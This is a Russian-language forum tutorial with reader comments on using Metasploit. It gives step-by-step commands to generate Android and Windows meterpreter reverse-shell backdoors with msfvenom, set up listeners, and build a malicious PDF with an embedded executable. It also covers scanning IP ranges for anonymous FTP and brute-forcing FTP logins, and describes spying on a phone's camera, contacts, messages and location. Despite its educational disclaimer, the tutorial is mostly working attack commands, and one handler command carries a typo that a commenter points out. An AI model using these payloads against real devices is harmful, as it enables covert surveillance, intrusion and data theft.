• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Metasploit. Учимся вместе полезным фишкам.

prw.jpg

Введение

Рад приветствовать дорогих читателей! Я практически уверен, что все, кто читает данную статью, как минимум слышали про такой замечательный фреймворк как Metasploit. Данный фреймворк хранит в себе довольно богатую базу данных различных уязвимостей на любой вкус и цвет, которые только возможно проэксплуатировать. В этой статье хочу познакомить вас с некоторыми полезными и даже можно выразиться базовыми уязвимостями, которые здорово помогут вам в изучении сферы информационной безопасности и естественно в саморазвитии.

Дисклеймер: Все данные, предоставленные в данной статье, взяты из открытых источников, не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.

Практическая часть

Итак, конечно же все действия будут проводиться на моей любимой Kali Linux, тем более там этот фреймворк уже предустановлен, поэтому если что, можно сразу к командам приступать и не париться.

Бэкдор на андроид

Здесь мы будем генерировать полезную нагрузку на андроид устройствах, делается всё довольно просто.

Мы вписываем вот такую команду для генерации:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test.apk

Что же означает данная команда? Давайте разберём!
  • Часть строки, где написано android, указывает на операционную систему, под которую генерируется полезная нагрузка;
  • meterpreter/reverse_tcp означает то, что подключаться к хосту данный бэкдор будет по протоколу tcp;
  • lhost = 192.168.0.9 означает IP хоста, к которому будет подключаться бэкдор. Так как в рамках тестирования и ознакомления всё будет проходить в локальной сети, я ввёл свой локальный IP адрес. Для того, чтобы можно было подключиться из глобальной сети к вам, соответственно, нужен будет глобальный ваш IP адрес и при реверс инжиниринге бэкдора, его будет довольно легко выявить;
  • lport = 4444 это собственно порт, по которому бэкдор будет обращаться к нам;
  • И как не сложно догадаться, в строчке R > Test.apk задаётся название нашей полезной нагрузке.
После того как она сгенерировалась, у вас в каталоге появиться ваш apk файл. Теперь я закидываю бэкдор на тестовое устройство android, но перед тем как его закинуть, нужно подготовиться к ловле сессии в нашем фреймворке. Для этого нам нужно будет его запустить вот этой командой msfconsole.

После того как мы его запустили, нам нужно выбрать нашу полезную нагрузку, а для этого вписываем последовательно следующие команды:

use exploit/multi/handler

в данной команде мы выбираем эксплоит удалённого доступа

set payload android/meterpreter/reverse_tcp

здесь мы выбираем платформу и способ подключения

set lhost 192.168.0.9

задаём наш хост

set lport 4444

задаём порт

exploit

ну и собственно запускаем

1676302650481.png


Ну теперь я устанавливаю и открываю файл полезной нагрузки, и на экране моментально получаю сессию к моему устройству. Спектр возможностей удалённого доступа здесь весьма обширный. Можно сделать фотку через любую из камер телефона, лазить по директориям и скачивать какие-либо файлы, делать полный дамп номеров в телефонной книге, сообщений и звонков, узнать местоположение и многое многое другое.

Бэкдор на Windows.

Ну здесь всё происходит впринципе аналогичным образом, нужно будет поменять лишь несколько строчек.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test2.exe

Команда так же весьма проста и понятна, поэтому переходим сразу к нашему фреймворку. Запускаем его msfconsole.

Ну и далее так же по очереди запускаем следующие команды

Код:
use exploit/mulit/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 4444

exploit

1676302664533.png


Далее аналогичным образом проверяем всё это дело на Windows по средством запуска и сессия готова.

Эксплоит в PDF

Так же для фреймворка не составит труда сгенерировать PDF файл с полезной нагрузкой и аналогичным образом подключиться к нему. Давайте же приступим!

Здесь уже msfvenom нам не понадобиться, будем всё делать прямиком в метасплоите, поэтому снова его запускаем msfconsole.

Далее прописываем вот такие команды:

Код:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Здесь будет задействован эксполит, который будет встроен в PDF файл

Код:
set lhost 192.168.0.9

set lport 4444

set filename Test3.pdf

Здесь задаём имя нашему файлу

Код:
exploit

1676302691690.png


Ну и далее генерируется полезная нагрузка в виде файла PDF. Подключиться можно будет так же через multi/handler. То есть просто не выходя из консоли прописываем:

Код:
use exploit/multi/handler

set lhost 192.168.0.9

set lport 4444

exploit

Ну и ждём сессии.

Вход по ftp

Так же наш фреймворк может спокойно просканировать диапазон IP адресов на возможность подключения к какому-либо с помощью ftp через логин Anonymous

Для этого мы запускаем наш фреймворк msfconsole.

И вводим следующие команды:

Код:
use auxiliary/scanner/ftp/anonymous
Выбираем наш сканер

Код:
set RHOSTS 192.168.1.200-254
Выбираем диапазон адресов для сканирования

Код:
set THREADS 55
run

Ну и собственно далее на экране у нас будут адреса на которых есть ftp и к которым можно подключиться через логин Anonymous без пароля и легко получить доступ.

1676302705781.png


Таким же образом можно и подбирать логин с паролем к диапазону адресов, для этого вводим следующие команды:

Код:
set RHOSTS 192.168.69.50-254
set THREADS 205
set USERNAME msfadmin
set PASSWORD msfadmin
set VERBOSE false
run

1676302718311.png


Ну и далее мы увидим адреса на которых есть ftp и к которым можно подключиться используя заданные вами логин и пароль для подбора.

Заключение

Сегодня поведал вам немного о такой волшебной и удивительной штуке как Metasploit Framework. И у него весьма широкий спектр применений, через него можно выполнять практически все ключевые задачи в тестировании чего-либо на уязвимость, но опять же повторюсь, что данная статья не побуждает к злонамеренным действиям и несёт лишь ознакомительный характер.
 
Последнее редактирование:

piok

Member
03.03.2023
5
0
BIT
0
Добрый день, я так скажем начинающий ИБ, которому нравится вся эта движуха:)
Подскажите пожалуйста, я уже пользовался msfvenom и такой вопрос.
Для чего использовать ключ (флаг) R > если существует ключ(флаг) -o которая позволяет также полезную нагрузку пихать в создаваемый файл? Можете пожалуйста немного рассказать в чём разница данных флагов?
Спасибо.
 

B13

Заблокирован
01.01.2020
412
55
BIT
134
Добрый день, я так скажем начинающий ИБ, которому нравится вся эта движуха:)
Подскажите пожалуйста, я уже пользовался msfvenom и такой вопрос.
Для чего использовать ключ (флаг) R > если существует ключ(флаг) -o которая позволяет также полезную нагрузку пихать в создаваемый файл? Можете пожалуйста немного рассказать в чём разница данных флагов?
Спасибо.
man msfvenom пробовали команду?
 

piok

Member
03.03.2023
5
0
BIT
0
man msfvenom пробовали команду?
Добрый день, спасибо за ответ. Да, выводит описание использования утилиты и описание флагов. Посмотрел внимательно, там нет описание на счет флага "R". Если смотреть на Example, то там пример использования утилиты с флагом "-o". Что на счет стрелки ">", то это я как понимаю выходной поток выполненной команды в файл. По типу ">>". Если не ошибаюсь конечно.
Спасибо.
С уважением, Евгений.
 

bigboss3000

One Level
18.03.2018
2
1
BIT
1
Замени use exploit/mulit/handler на use exploit/multi/handler и не позорься, а так статья норм
 
  • Нравится
Реакции: User17

Telly

New member
30.07.2023
1
0
BIT
0
Приветствую! Ситуация следующая, создаю пейлоад по шагам выше, загружаю на свой телефон - выдает ошибку "Это приложение было создано для более ранней версии Android". Сессия не создается. Подскажите пожалуйста, как исправить?

Тестировал на 11 андройде, создавал на Kali (VB). Kali обновлял
 

User17

Green Team
24.12.2022
48
202
BIT
24
Приветствую! Ситуация следующая, создаю пейлоад по шагам выше, загружаю на свой телефон - выдает ошибку "Это приложение было создано для более ранней версии Android". Сессия не создается. Подскажите пожалуйста, как исправить?

Тестировал на 11 андройде, создавал на Kali (VB). Kali обновлял
Пейлоад создается к сожалению только на версии Android раньше 11ой
 

LinDis

New member
08.11.2019
1
0
BIT
1
Подскажите пожалуйста вопрос, а речь ведь идет о Metasploit Framework или Metasploit Pro, почитал что только в коммерческой все работает,

ну и сам попробовал, по инструкции пишет Handler failed to bind to ip.ip.ip.ip:4321, так же не совсем понял какой порт нужно вписывать,

просветите кто вкурсе?

Спасибо!
 

D3L1F3R

Red Team
20.02.2022
305
81
BIT
330
Подскажите пожалуйста вопрос, а речь ведь идет о Metasploit Framework или Metasploit Pro, почитал что только в коммерческой все работает,

ну и сам попробовал, по инструкции пишет Handler failed to bind to ip.ip.ip.ip:4321, так же не совсем понял какой порт нужно вписывать,

просветите кто вкурсе?

Спасибо!
Написано же всё понятно, не знаю как вам помочь, ищите другую дыру
 
  • Нравится
Реакции: LinDis
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!